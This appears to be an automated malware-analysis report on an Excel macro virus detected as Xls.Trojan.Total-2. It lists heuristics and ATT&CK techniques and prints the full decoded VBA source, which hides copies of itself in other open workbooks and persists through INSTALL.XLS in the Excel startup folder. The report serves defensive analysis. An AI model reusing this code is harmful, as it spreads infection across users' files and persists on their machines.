Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel file containing VBA macros, including auto_open and auto_close procedures, which are commonly used for malicious purposes. On open, the macro registers its `total` routine as the OnSheetActivate handler; that routine copies the "sum_total" module into every other open workbook that does not already contain it and hides the copied module. On close, the macro copies the module into a new hidden workbook and saves it as 'INSTALL.XLS' in the Excel startup path, a persistence mechanism that reloads the macro each time Excel starts. The auto_open and auto_close macros, the self-replication into other workbooks, and the file's detection as 'Xls.Trojan.Total-2' together strongly indicate malicious intent.
Heuristics (4)
- ClamAV: Xls.Trojan.Total-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Total-2
- VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2109 bytes |

SHA-256: ff0527cfeb0c234ae8873b33a3a1020113f43265f483900c57134bcfe27dd943

Detection: ClamAV: Xls.Trojan.Total-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "sum_total"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ThisWorkbook.Name & "!sum_total.total"
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
'On Error Resume Next
PC_INITIAL_BOOK = Application.ThisWorkbook.Name
If Dir("C:\PASS.NHS") = "PASS.NHS" Then Exit Sub
pc_excel_startup_path = Application.StartupPath + "\INSTALL.XLS"
If Dir(pc_excel_startup_path) = "INSTALL.XLS" Then Exit Sub
'dstart:
'MsgBox "STARTING UP!"
ThisWorkbook.Modules("sum_total").Copy
new_book = ActiveWorkbook.Name
WindowState = xlMaximized
Application.Windows(new_book).Visible = False
'Application.Workbooks(new_book).SaveAs filename:=PC_EXCEL_STARTUP_PATH
Application.Workbooks(new_book).SaveAs filename:=pc_excel_startup_path
'MsgBox "All done saved as " & pc_excel_startup_path
'thisWorkbook.SaveAs filename:=PC_EXCEL_STARTUP_PATH
'ThisWorkbook.SaveAs filename:=PC_INITIAL_BOOK
End Sub
Sub total()
Attribute total.VB_ProcData.VB_Invoke_Func = " \n14"
PC_BOOK_COUNT = Application.Workbooks.Count
If PC_BOOK_COUNT = 1 Then Exit Sub
For pc_first_loop = 1 To PC_BOOK_COUNT
pc_copy_trigger = 0
PC_TARGET = Workbooks(pc_first_loop).Name
If PC_TARGET = ThisWorkbook.Name Then GoTo redundancy_check
pc_module_count = Workbooks(PC_TARGET).Modules.Count
If pc_module_count > 0 Then
For PC_SECOND_LOOP = 1 To pc_module_count
If Workbooks(PC_TARGET).Modules(PC_SECOND_LOOP).Name = "sum_total" Then pc_copy_trigger = 1
Next PC_SECOND_LOOP
End If
If pc_copy_trigger = 0 Then
Windows(PC_TARGET).Activate
ThisWorkbook.Modules("sum_total").Copy before:=Workbooks(PC_TARGET).Sheets(1)
Workbooks(PC_TARGET).Modules("sum_total").Visible = False
End If
redundancy_check:
Next pc_first_loop
skip:
Exit Sub
' ***********************************
' * IF YOU READ THIS THEN YOU WILL *
' * REALISE THAT YOU HAVE THE MOST *
' * RUBBISH ANTI-VIRUS SOFTWARE *
' * BEWARE BECAUSE RELEASE II WILL *
' * SCRAMBLE YOUR FAT - XOH *
' ***********************************
End Sub
```